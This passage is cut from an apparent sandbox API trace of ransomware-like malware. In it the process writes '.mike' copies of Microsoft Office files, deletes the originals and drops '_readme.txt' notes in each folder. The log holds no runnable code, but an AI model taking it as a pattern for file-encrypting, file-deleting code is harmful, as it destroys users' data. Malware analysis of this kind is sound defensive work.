lpBuffer=0x2aec00, lpFilePart=0x0 | out: lpBuffer="C:\\Program Files\\Microsoft Office\\Office14\\Groove\\ToolData\\groove.net\\Welcome Tool\\IconImages.jpg.mike", lpFilePart=0x0) returned 0x66 [0077.477] GetFullPathNameW (in: lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\Groove\\ToolData\\groove.net\\Welcome Tool\\IconImages.jpg.mike", nBufferLength=0x105, lpBuffer=0x2aebfc, lpFilePart=0x0 | out: lpBuffer="C:\\Program Files\\Microsoft Office\\Office14\\Groove\\ToolData\\groove.net\\Welcome Tool\\IconImages.jpg.mike", lpFilePart=0x0) returned 0x66 [0077.477] SetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\Groove\\ToolData\\groove.net\\Welcome Tool\\IconImages.jpg", dwFileAttributes=0x80) returned 1 [0077.477] DeleteFileW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\Groove\\ToolData\\groove.net\\Welcome Tool\\IconImages.jpg" (normalized: "c:\\program files\\microsoft office\\office14\\groove\\tooldata\\groove.net\\welcome tool\\iconimages.jpg")) returned 1 [0077.478] GetFullPathNameW (in: lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\Groove\\ToolData\\groove.net\\Welcome Tool\\_readme.txt", nBufferLength=0x105, lpBuffer=0x2aea9c, lpFilePart=0x0 | out: lpBuffer="C:\\Program Files\\Microsoft Office\\Office14\\Groove\\ToolData\\groove.net\\Welcome Tool\\_readme.txt", lpFilePart=0x0) returned 0x5e [0077.480] CoTaskMemAlloc (cb=0x20c) returned 0x506980 [0077.480] GetSystemDirectoryW (in: lpBuffer=0x506980, uSize=0x104 | out: lpBuffer="C:\\Windows\\system32") returned 0x13 [0077.480] CoTaskMemFree (pv=0x506980) [0077.480] GetFullPathNameW (in: lpFileName="C:\\Windows\\system32", nBufferLength=0x105, lpBuffer=0x2aec68, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\system32", lpFilePart=0x0) returned 0x13 [0077.480] GetFullPathNameW (in: lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\Groove\\ToolIcons", nBufferLength=0x105, lpBuffer=0x2aecdc, lpFilePart=0x0 | out: lpBuffer="C:\\Program Files\\Microsoft Office\\Office14\\Groove\\ToolIcons", lpFilePart=0x0) returned 0x3b [0077.486] CoTaskMemAlloc (cb=0x20c) returned 0x506980 [0077.486] GetSystemDirectoryW (in: lpBuffer=0x506980, uSize=0x104 | out: lpBuffer="C:\\Windows\\system32") returned 0x13 [0077.486] CoTaskMemFree (pv=0x506980) [0077.486] GetFullPathNameW (in: lpFileName="C:\\Windows\\system32", nBufferLength=0x105, lpBuffer=0x2aec68, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\system32", lpFilePart=0x0) returned 0x13 [0077.486] GetFullPathNameW (in: lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\Groove\\XML Files", nBufferLength=0x105, lpBuffer=0x2aecdc, lpFilePart=0x0 | out: lpBuffer="C:\\Program Files\\Microsoft Office\\Office14\\Groove\\XML Files", lpFilePart=0x0) returned 0x3b [0077.489] GetDiskFreeSpaceExW (in: lpDirectoryName="C:\\", lpFreeBytesAvailableToCaller=0x2af194, lpTotalNumberOfBytes=0x2af18c, lpTotalNumberOfFreeBytes=0x2af184 | out: lpFreeBytesAvailableToCaller=0x2af194, lpTotalNumberOfBytes=0x2af18c, lpTotalNumberOfFreeBytes=0x2af184) returned 1 [0077.489] GetFullPathNameW (in: lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\Groove\\XML Files\\Messenger.xml.mike", nBufferLength=0x105, lpBuffer=0x2aec90, lpFilePart=0x0 | out: lpBuffer="C:\\Program Files\\Microsoft Office\\Office14\\Groove\\XML Files\\Messenger.xml.mike", lpFilePart=0x0) returned 0x4e [0077.490] GetFullPathNameW (in: lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\Groove\\XML Files\\Messenger.xml", nBufferLength=0x105, lpBuffer=0x2aebf4, lpFilePart=0x0 | out: lpBuffer="C:\\Program Files\\Microsoft Office\\Office14\\Groove\\XML Files\\Messenger.xml", lpFilePart=0x0) returned 0x49 [0077.493] WriteFile (in: hFile=0x288, lpBuffer=0x22fd264*, nNumberOfBytesToWrite=0x20c, lpNumberOfBytesWritten=0x2af0a4, lpOverlapped=0x0 | out: lpBuffer=0x22fd264*, lpNumberOfBytesWritten=0x2af0a4*=0x20c, lpOverlapped=0x0) returned 1 [0077.493] GetFullPathNameW (in: lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\Groove\\XML Files\\Messenger.xml.mike", nBufferLength=0x105, lpBuffer=0x2aec90, lpFilePart=0x0 | out: lpBuffer="C:\\Program Files\\Microsoft Office\\Office14\\Groove\\XML Files\\Messenger.xml.mike", lpFilePart=0x0) returned 0x4e [0077.493] GetFullPathNameW (in: lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\Groove\\XML Files\\Messenger.xml.mike", nBufferLength=0x105, lpBuffer=0x2aec8c, lpFilePart=0x0 | out: lpBuffer="C:\\Program Files\\Microsoft Office\\Office14\\Groove\\XML Files\\Messenger.xml.mike", lpFilePart=0x0) returned 0x4e [0077.493] SetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\Groove\\XML Files\\Messenger.xml", dwFileAttributes=0x80) returned 1 [0077.494] DeleteFileW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\Groove\\XML Files\\Messenger.xml" (normalized: "c:\\program files\\microsoft office\\office14\\groove\\xml files\\messenger.xml")) returned 1 [0077.495] GetFullPathNameW (in: lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\Groove\\XML Files\\_readme.txt", nBufferLength=0x105, lpBuffer=0x2aeb2c, lpFilePart=0x0 | out: lpBuffer="C:\\Program Files\\Microsoft Office\\Office14\\Groove\\XML Files\\_readme.txt", lpFilePart=0x0) returned 0x47 [0077.497] GetDiskFreeSpaceExW (in: lpDirectoryName="C:\\", lpFreeBytesAvailableToCaller=0x2af194, lpTotalNumberOfBytes=0x2af18c, lpTotalNumberOfFreeBytes=0x2af184 | out: lpFreeBytesAvailableToCaller=0x2af194, lpTotalNumberOfBytes=0x2af18c, lpTotalNumberOfFreeBytes=0x2af184) returned 1 [0077.497] GetFullPathNameW (in: lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\Groove\\XML Files\\StarterApplicationDescriptors.xml.mike", nBufferLength=0x105, lpBuffer=0x2aec90, lpFilePart=0x0 | out: lpBuffer="C:\\Program Files\\Microsoft Office\\Office14\\Groove\\XML Files\\StarterApplicationDescriptors.xml.mike", lpFilePart=0x0) returned 0x62 [0077.497] GetFullPathNameW (in: lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\Groove\\XML Files\\StarterApplicationDescriptors.xml", nBufferLength=0x105, lpBuffer=0x2aebf4, lpFilePart=0x0 | out: lpBuffer="C:\\Program Files\\Microsoft Office\\Office14\\Groove\\XML Files\\StarterApplicationDescriptors.xml", lpFilePart=0x0) returned 0x5d [0077.507] GetFullPathNameW (in: lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\Groove\\XML Files\\StarterApplicationDescriptors.xml.mike", nBufferLength=0x105, lpBuffer=0x2aec90, lpFilePart=0x0 | out: lpBuffer="C:\\Program Files\\Microsoft Office\\Office14\\Groove\\XML Files\\StarterApplicationDescriptors.xml.mike", lpFilePart=0x0) returned 0x62 [0077.507] GetFullPathNameW (in: lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\Groove\\XML Files\\StarterApplicationDescriptors.xml.mike", nBufferLength=0x105, lpBuffer=0x2aec8c, lpFilePart=0x0 | out: lpBuffer="C:\\Program Files\\Microsoft Office\\Office14\\Groove\\XML Files\\StarterApplicationDescriptors.xml.mike", lpFilePart=0x0) returned 0x62 [0077.507] SetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\Groove\\XML Files\\StarterApplicationDescriptors.xml", dwFileAttributes=0x80) returned 1 [0077.507] DeleteFileW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\Groove\\XML Files\\StarterApplicationDescriptors.xml" (normalized: "c:\\program files\\microsoft office\\office14\\groove\\xml files\\starterapplicationdescriptors.xml")) returned 1 [0077.509] GetFullPathNameW (in: lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\Groove\\XML Files\\_readme.txt", nBufferLength=0x105, lpBuffer=0x2aeb2c, lpFilePart=0x0 | out: lpBuffer="C:\\Program Files\\Microsoft Office\\Office14\\Groove\\XML Files\\_readme.txt", lpFilePart=0x0) returned 0x47 [0077.511] GetDiskFreeSpaceExW (in: lpDirectoryName="C:\\", lpFreeBytesAvailableToCaller=0x2af194, lpTotalNumberOfBytes=0x2af18c, lpTotalNumberOfFreeBytes=0x2af184 | out: lpFreeBytesAvailableToCaller=0x2af194, lpTotalNumberOfBytes=0x2af18c, lpTotalNumberOfFreeBytes=0x2af184) returned 1 [0077.511] GetFullPathNameW (in: lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\Groove\\XML Files\\StarterNotificationDescriptors.xml.mike", nBufferLength=0x105, lpBuffer=0x2aec90, lpFilePart=0x0 | out: lpBuffer="C:\\Program Files\\Microsoft Office\\Office14\\Groove\\XML Files\\StarterNotificationDescriptors.xml.mike", lpFilePart=0x0) returned 0x63 [0077.511] GetFullPathNameW (in: lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\Groove\\XML Files\\StarterNotificationDescriptors.xml", nBufferLength=0x105, lpBuffer=0x2aebf4, lpFilePart=0x0 | out: lpBuffer="C:\\Program Files\\Microsoft Office\\Office14\\Groove\\XML Files\\StarterNotificationDescriptors.xml", lpFilePart=0x0) returned 0x5e [0077.520] WriteFile (in: hFile=0x288, lpBuffer=0x221feb0*, nNumberOfBytesToWrite=0x20c, lpNumberOfBytesWritten=0x2af0a4, lpOverlapped=0x0 | out: lpBuffer=0x221feb0*, lpNumberOfBytesWritten=0x2af0a4*=0x20c, lpOverlapped=0x0) returned 1 [0077.521] GetFullPathNameW (in: lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\Groove\\XML Files\\StarterNotificationDescriptors.xml.mike", nBufferLength=0x105, lpBuffer=0x2aec90, lpFilePart=0x0 | out: lpBuffer="C:\\Program Files\\Microsoft Office\\Office14\\Groove\\XML Files\\StarterNotificationDescriptors.xml.mike", lpFilePart=0x0) returned 0x63 [0077.521] GetFullPathNameW (in: lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\Groove\\XML Files\\StarterNotificationDescriptors.xml.mike", nBufferLength=0x105, lpBuffer=0x2aec8c, lpFilePart=0x0 | out: lpBuffer="C:\\Program Files\\Microsoft Office\\Office14\\Groove\\XML Files\\StarterNotificationDescriptors.xml.mike", lpFilePart=0x0) returned 0x63 [0077.521] SetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\Groove\\XML Files\\StarterNotificationDescriptors.xml", dwFileAttributes=0x80) returned 1 [0077.521] DeleteFileW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\Groove\\XML Files\\StarterNotificationDescriptors.xml" (normalized: "c:\\program files\\microsoft office\\office14\\groove\\xml files\\starternotificationdescriptors.xml")) returned 1 [0077.523] GetFullPathNameW (in: lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\Groove\\XML Files\\_readme.txt", nBufferLength=0x105, lpBuffer=0x2aeb2c, lpFilePart=0x0 | out: lpBuffer="C:\\Program Files\\Microsoft Office\\Office14\\Groove\\XML Files\\_readme.txt", lpFilePart=0x0) returned 0x47 [0077.525] GetDiskFreeSpaceExW (in: lpDirectoryName="C:\\", lpFreeBytesAvailableToCaller=0x2af194, lpTotalNumberOfBytes=0x2af18c, lpTotalNumberOfFreeBytes=0x2af184 | out: lpFreeBytesAvailableToCaller=0x2af194, lpTotalNumberOfBytes=0x2af18c, lpTotalNumberOfFreeBytes=0x2af184) returned 1 [0077.525] GetFullPathNameW (in: lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\Groove\\XML Files\\StarterToolTemplates.xml.mike", nBufferLength=0x105, lpBuffer=0x2aec90, lpFilePart=0x0 | out: lpBuffer="C:\\Program Files\\Microsoft Office\\Office14\\Groove\\XML Files\\StarterToolTemplates.xml.mike", lpFilePart=0x0) returned 0x59 [0077.525] GetFullPathNameW (in: lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\Groove\\XML Files\\StarterToolTemplates.xml", nBufferLength=0x105, lpBuffer=0x2aebf4, lpFilePart=0x0 | out: lpBuffer="C:\\Program Files\\Microsoft Office\\Office14\\Groove\\XML Files\\StarterToolTemplates.xml", lpFilePart=0x0) returned 0x54 [0077.536] GetFullPathNameW (in: lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\Groove\\XML Files\\StarterToolTemplates.xml.mike", nBufferLength=0x105, lpBuffer=0x2aec90, lpFilePart=0x0 | out: lpBuffer="C:\\Program Files\\Microsoft Office\\Office14\\Groove\\XML Files\\StarterToolTemplates.xml.mike", lpFilePart=0x0) returned 0x59 [0077.537] GetFullPathNameW (in: lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\Groove\\XML Files\\StarterToolTemplates.xml.mike", nBufferLength=0x105, lpBuffer=0x2aec8c, lpFilePart=0x0 | out: lpBuffer="C:\\Program Files\\Microsoft Office\\Office14\\Groove\\XML Files\\StarterToolTemplates.xml.mike", lpFilePart=0x0) returned 0x59 [0077.537] SetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\Groove\\XML Files\\StarterToolTemplates.xml", dwFileAttributes=0x80) returned 1 [0077.537] DeleteFileW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\Groove\\XML Files\\StarterToolTemplates.xml" (normalized: "c:\\program files\\microsoft office\\office14\\groove\\xml files\\startertooltemplates.xml")) returned 1 [0077.538] GetFullPathNameW (in: lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\Groove\\XML Files\\_readme.txt", nBufferLength=0x105, lpBuffer=0x2aeb2c, lpFilePart=0x0 | out: lpBuffer="C:\\Program Files\\Microsoft Office\\Office14\\Groove\\XML Files\\_readme.txt", lpFilePart=0x0) returned 0x47 [0077.540] CoTaskMemAlloc (cb=0x20c) returned 0x506980 [0077.540] GetSystemDirectoryW (in: lpBuffer=0x506980, uSize=0x104 | out: lpBuffer="C:\\Windows\\system32") returned 0x13 [0077.540] CoTaskMemFree (pv=0x506980) [0077.540] GetFullPathNameW (in: lpFileName="C:\\Windows\\system32", nBufferLength=0x105, lpBuffer=0x2aec20, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\system32", lpFilePart=0x0) returned 0x13 [0077.541] CoTaskMemAlloc (cb=0x20c) returned 0x506980 [0077.541] GetSystemDirectoryW (in: lpBuffer=0x506980, uSize=0x104 | out: lpBuffer="C:\\Windows\\system32") returned 0x13 [0077.541] CoTaskMemFree (pv=0x506980) [0077.541] GetFullPathNameW (in: lpFileName="C:\\Windows\\system32", nBufferLength=0x105, lpBuffer=0x2aecb0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\system32", lpFilePart=0x0) returned 0x13 [0077.541] GetFullPathNameW (in: lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\InfoPathOM", nBufferLength=0x105, lpBuffer=0x2aed24, lpFilePart=0x0 | out: lpBuffer="C:\\Program Files\\Microsoft Office\\Office14\\InfoPathOM", lpFilePart=0x0) returned 0x35 [0077.545] GetDiskFreeSpaceExW (in: lpDirectoryName="C:\\", lpFreeBytesAvailableToCaller=0x2af1dc, lpTotalNumberOfBytes=0x2af1d4, lpTotalNumberOfFreeBytes=0x2af1cc | out: lpFreeBytesAvailableToCaller=0x2af1dc, lpTotalNumberOfBytes=0x2af1d4, lpTotalNumberOfFreeBytes=0x2af1cc) returned 1 [0077.545] GetFullPathNameW (in: lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\InfoPathOM\\Microsoft.Office.InfoPath.xml.mike", nBufferLength=0x105, lpBuffer=0x2aecd8, lpFilePart=0x0 | out: lpBuffer="C:\\Program Files\\Microsoft Office\\Office14\\InfoPathOM\\Microsoft.Office.InfoPath.xml.mike", lpFilePart=0x0) returned 0x58 [0077.572] GetFullPathNameW (in: lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\InfoPathOM\\Microsoft.Office.InfoPath.xml.mike", nBufferLength=0x105, lpBuffer=0x2aecd8, lpFilePart=0x0 | out: lpBuffer="C:\\Program Files\\Microsoft Office\\Office14\\InfoPathOM\\Microsoft.Office.InfoPath.xml.mike", lpFilePart=0x0) returned 0x58 [0077.572] GetFullPathNameW (in: lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\InfoPathOM\\Microsoft.Office.InfoPath.xml.mike", nBufferLength=0x105, lpBuffer=0x2aecd4, lpFilePart=0x0 | out: lpBuffer="C:\\Program Files\\Microsoft Office\\Office14\\InfoPathOM\\Microsoft.Office.InfoPath.xml.mike", lpFilePart=0x0) returned 0x58 [0077.572] SetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\InfoPathOM\\Microsoft.Office.InfoPath.xml", dwFileAttributes=0x80) returned 1 [0077.573] DeleteFileW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\InfoPathOM\\Microsoft.Office.InfoPath.xml" (normalized: "c:\\program files\\microsoft office\\office14\\infopathom\\microsoft.office.infopath.xml")) returned 1 [0077.575] GetFullPathNameW (in: lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\InfoPathOM\\_readme.txt", nBufferLength=0x105, lpBuffer=0x2aeb74, lpFilePart=0x0 | out: lpBuffer="C:\\Program Files\\Microsoft Office\\Office14\\InfoPathOM\\_readme.txt", lpFilePart=0x0) returned 0x41 [0077.576] CoTaskMemAlloc (cb=0x20c) returned 0x506980 [0077.576] GetSystemDirectoryW (in: lpBuffer=0x506980, uSize=0x104 | out: lpBuffer="C:\\Windows\\system32") returned 0x13 [0077.576] CoTaskMemFree (pv=0x506980) [0077.576] GetFullPathNameW (in: lpFileName="C:\\Windows\\system32", nBufferLength=0x105, lpBuffer=0x2aec68, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\system32", lpFilePart=0x0) returned 0x13 [0077.577] GetFullPathNameW (in: lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\InfoPathOM\\InfoPathOMFormServices", nBufferLength=0x105, lpBuffer=0x2aecdc, lpFilePart=0x0 | out: lpBuffer="C:\\Program Files\\Microsoft Office\\Office14\\InfoPathOM\\InfoPathOMFormServices", lpFilePart=0x0) returned 0x4c [0077.581] GetDiskFreeSpaceExW (in: lpDirectoryName="C:\\", lpFreeBytesAvailableToCaller=0x2af194, lpTotalNumberOfBytes=0x2af18c, lpTotalNumberOfFreeBytes=0x2af184 | out: lpFreeBytesAvailableToCaller=0x2af194, lpTotalNumberOfBytes=0x2af18c, lpTotalNumberOfFreeBytes=0x2af184) returned 1 [0077.581] GetFullPathNameW (in: lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\InfoPathOM\\InfoPathOMFormServices\\Microsoft.Office.InfoPath.xml.mike", nBufferLength=0x105, lpBuffer=0x2aec90, lpFilePart=0x0 | out: lpBuffer="C:\\Program Files\\Microsoft Office\\Office14\\InfoPathOM\\InfoPathOMFormServices\\Microsoft.Office.InfoPath.xml.mike", lpFilePart=0x0) returned 0x6f [0077.609] GetFullPathNameW (in: lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\InfoPathOM\\InfoPathOMFormServices\\Microsoft.Office.InfoPath.xml.mike", nBufferLength=0x105, lpBuffer=0x2aec90, lpFilePart=0x0 | out: lpBuffer="C:\\Program Files\\Microsoft Office\\Office14\\InfoPathOM\\InfoPathOMFormServices\\Microsoft.Office.InfoPath.xml.mike", lpFilePart=0x0) returned 0x6f [0077.609] GetFullPathNameW (in: lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\InfoPathOM\\InfoPathOMFormServices\\Microsoft.Office.InfoPath.xml.mike", nBufferLength=0x105, lpBuffer=0x2aec8c, lpFilePart=0x0 | out: lpBuffer="C:\\Program Files\\Microsoft Office\\Office14\\InfoPathOM\\InfoPathOMFormServices\\Microsoft.Office.InfoPath.xml.mike", lpFilePart=0x0) returned 0x6f [0077.609] SetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\InfoPathOM\\InfoPathOMFormServices\\Microsoft.Office.InfoPath.xml", dwFileAttributes=0x80) returned 1 [0077.609] DeleteFileW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\InfoPathOM\\InfoPathOMFormServices\\Microsoft.Office.InfoPath.xml" (normalized: "c:\\program files\\microsoft office\\office14\\infopathom\\infopathomformservices\\microsoft.office.infopath.xml")) returned 1 [0077.612] GetFullPathNameW (in: lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\InfoPathOM\\InfoPathOMFormServices\\_readme.txt", nBufferLength=0x105, lpBuffer=0x2aeb2c, lpFilePart=0x0 | out: lpBuffer="C:\\Program Files\\Microsoft Office\\Office14\\InfoPathOM\\InfoPathOMFormServices\\_readme.txt", lpFilePart=0x0) returned 0x58 [0077.614] CoTaskMemAlloc (cb=0x20c) returned 0x506980 [0077.614] GetSystemDirectoryW (in: lpBuffer=0x506980, uSize=0x104 | out: lpBuffer="C:\\Windows\\system32") returned 0x13 [0077.614] CoTaskMemFree (pv=0x506980) [0077.614] GetFullPathNameW (in: lpFileName="C:\\Windows\\system32", nBufferLength=0x105, lpBuffer=0x2aec20, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\system32", lpFilePart=0x0) returned 0x13 [0077.614] GetFullPathNameW (in: lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\InfoPathOM\\InfoPathOMFormServices\\InfoPathOMFormServicesV12", nBufferLength=0x105, lpBuffer=0x2aec94, lpFilePart=0x0 | out: lpBuffer="C:\\Program Files\\Microsoft Office\\Office14\\InfoPathOM\\InfoPathOMFormServices\\InfoPathOMFormServicesV12", lpFilePart=0x0) returned 0x66 [0077.615] GetDiskFreeSpaceExW (in: lpDirectoryName="C:\\", lpFreeBytesAvailableToCaller=0x2af14c, lpTotalNumberOfBytes=0x2af144, lpTotalNumberOfFreeBytes=0x2af13c | out: lpFreeBytesAvailableToCaller=0x2af14c, lpTotalNumberOfBytes=0x2af144, lpTotalNumberOfFreeBytes=0x2af13c) returned 1 [0077.615] GetFullPathNameW (in: lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\InfoPathOM\\InfoPathOMFormServices\\InfoPathOMFormServicesV12\\Microsoft.Office.InfoPath.xml.mike", nBufferLength=0x105, lpBuffer=0x2aec48, lpFilePart=0x0 | out: lpBuffer="C:\\Program Files\\Microsoft Office\\Office14\\InfoPathOM\\InfoPathOMFormServices\\InfoPathOMFormServicesV12\\Microsoft.Office.InfoPath.xml.mike", lpFilePart=0x0) returned 0x89 [0077.643] GetFullPathNameW (in: lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\InfoPathOM\\InfoPathOMFormServices\\InfoPathOMFormServicesV12\\Microsoft.Office.InfoPath.xml.mike", nBufferLength=0x105, lpBuffer=0x2aec44, lpFilePart=0x0 | out: lpBuffer="C:\\Program Files\\Microsoft Office\\Office14\\InfoPathOM\\InfoPathOMFormServices\\InfoPathOMFormServicesV12\\Microsoft.Office.InfoPath.xml.mike", lpFilePart=0x0) returned 0x89 [0077.643] SetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\InfoPathOM\\InfoPathOMFormServices\\InfoPathOMFormServicesV12\\Microsoft.Office.InfoPath.xml", dwFileAttributes=0x80) returned 1 [0077.644] DeleteFileW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\InfoPathOM\\InfoPathOMFormServices\\InfoPathOMFormServicesV12\\Microsoft.Office.InfoPath.xml" (normalized: "c:\\program files\\microsoft office\\office14\\infopathom\\infopathomformservices\\infopathomformservicesv12\\microsoft.office.infopath.xml")) returned 1 [0077.646] GetFullPathNameW (in: lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\InfoPathOM\\InfoPathOMFormServices\\InfoPathOMFormServicesV12\\_readme.txt", nBufferLength=0x105, lpBuffer=0x2aeae4, lpFilePart=0x0 | out: lpBuffer="C:\\Program Files\\Microsoft Office\\Office14\\InfoPathOM\\InfoPathOMFormServices\\InfoPathOMFormServicesV12\\_readme.txt", lpFilePart=0x0) returned 0x72 [0077.647] CoTaskMemAlloc (cb=0x20c) returned 0x506980 [0077.647] GetSystemDirectoryW (in: lpBuffer=0x506980, uSize=0x104 | out: lpBuffer="C:\\Windows\\system32") returned 0x13 [0077.647] CoTaskMemFree (pv=0x506980) [0077.647] GetFullPathNameW (in: lpFileName="C:\\Windows\\system32", nBufferLength=0x105, lpBuffer=0x2aec68, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\system32", lpFilePart=0x0) returned 0x13 [0077.648] GetFullPathNameW (in: lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\InfoPathOM\\InfoPathOMV12", nBufferLength=0x105, lpBuffer=0x2aecdc, lpFilePart=0x0 | out: lpBuffer="C:\\Program Files\\Microsoft Office\\Office14\\InfoPathOM\\InfoPathOMV12", lpFilePart=0x0) returned 0x43 [0077.649] GetDiskFreeSpaceExW (in: lpDirectoryName="C:\\", lpFreeBytesAvailableToCaller=0x2af194, lpTotalNumberOfBytes=0x2af18c, lpTotalNumberOfFreeBytes=0x2af184 | out: lpFreeBytesAvailableToCaller=0x2af194, lpTotalNumberOfBytes=0x2af18c, lpTotalNumberOfFreeBytes=0x2af184) returned 1 [0077.649] GetFullPathNameW (in: lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\InfoPathOM\\InfoPathOMV12\\Microsoft.Office.InfoPath.xml.mike", nBufferLength=0x105, lpBuffer=0x2aec90, lpFilePart=0x0 | out: lpBuffer="C:\\Program Files\\Microsoft Office\\Office14\\InfoPathOM\\InfoPathOMV12\\Microsoft.Office.InfoPath.xml.mike", lpFilePart=0x0) returned 0x66 [0077.675] GetFullPathNameW (in: lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\InfoPathOM\\InfoPathOMV12\\Microsoft.Office.InfoPath.xml.mike", nBufferLength=0x105, lpBuffer=0x2aec90, lpFilePart=0x0 | out: lpBuffer="C:\\Program Files\\Microsoft Office\\Office14\\InfoPathOM\\InfoPathOMV12\\Microsoft.Office.InfoPath.xml.mike", lpFilePart=0x0) returned 0x66 [0077.675] GetFullPathNameW (in: lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\InfoPathOM\\InfoPathOMV12\\Microsoft.Office.InfoPath.xml.mike", nBufferLength=0x105, lpBuffer=0x2aec8c, lpFilePart=0x0 | out: lpBuffer="C:\\Program Files\\Microsoft Office\\Office14\\InfoPathOM\\InfoPathOMV12\\Microsoft.Office.InfoPath.xml.mike", lpFilePart=0x0) returned 0x66 [0077.676] SetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\InfoPathOM\\InfoPathOMV12\\Microsoft.Office.InfoPath.xml", dwFileAttributes=0x80) returned 1 [0077.676] DeleteFileW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\InfoPathOM\\InfoPathOMV12\\Microsoft.Office.InfoPath.xml" (normalized: "c:\\program files\\microsoft office\\office14\\infopathom\\infopathomv12\\microsoft.office.infopath.xml")) returned 1 [0077.678] GetFullPathNameW (in: lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\InfoPathOM\\InfoPathOMV12\\_readme.txt", nBufferLength=0x105, lpBuffer=0x2aeb2c, lpFilePart=0x0 | out: lpBuffer="C:\\Program Files\\Microsoft Office\\Office14\\InfoPathOM\\InfoPathOMV12\\_readme.txt", lpFilePart=0x0) returned 0x4f [0077.679] CoTaskMemAlloc (cb=0x20c) returned 0x506980 [0077.679] GetSystemDirectoryW (in: lpBuffer=0x506980, uSize=0x104 | out: lpBuffer="C:\\Windows\\system32") returned 0x13 [0077.679] CoTaskMemFree (pv=0x506980) [0077.679] GetFullPathNameW (in: lpFileName="C:\\Windows\\system32", nBufferLength=0x105, lpBuffer=0x2aecb0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\system32", lpFilePart=0x0) returned 0x13 [0077.680] GetFullPathNameW (in: lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\Library", nBufferLength=0x105, lpBuffer=0x2aed24, lpFilePart=0x0 | out: lpBuffer="C:\\Program Files\\Microsoft Office\\Office14\\Library", lpFilePart=0x0) returned 0x32 [0077.680] GetDiskFreeSpaceExW (in: lpDirectoryName="C:\\", lpFreeBytesAvailableToCaller=0x2af1dc, lpTotalNumberOfBytes=0x2af1d4, lpTotalNumberOfFreeBytes=0x2af1cc | out: lpFreeBytesAvailableToCaller=0x2af1dc, lpTotalNumberOfBytes=0x2af1d4, lpTotalNumberOfFreeBytes=0x2af1cc) returned 1 [0077.681] GetFullPathNameW (in: lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\Library\\EUROTOOL.XLAM.mike", nBufferLength=0x105, lpBuffer=0x2aecd8, lpFilePart=0x0 | out: lpBuffer="C:\\Program Files\\Microsoft Office\\Office14\\Library\\EUROTOOL.XLAM.mike", lpFilePart=0x0) returned 0x45 [0077.748] GetFullPathNameW (in: lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\Library\\EUROTOOL.XLAM.mike", nBufferLength=0x105, lpBuffer=0x2aecd8, lpFilePart=0x0 | out: lpBuffer="C:\\Program Files\\Microsoft Office\\Office14\\Library\\EUROTOOL.XLAM.mike", lpFilePart=0x0) returned 0x45 [0077.748] GetFullPathNameW (in: lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\Library\\EUROTOOL.XLAM.mike", nBufferLength=0x105, 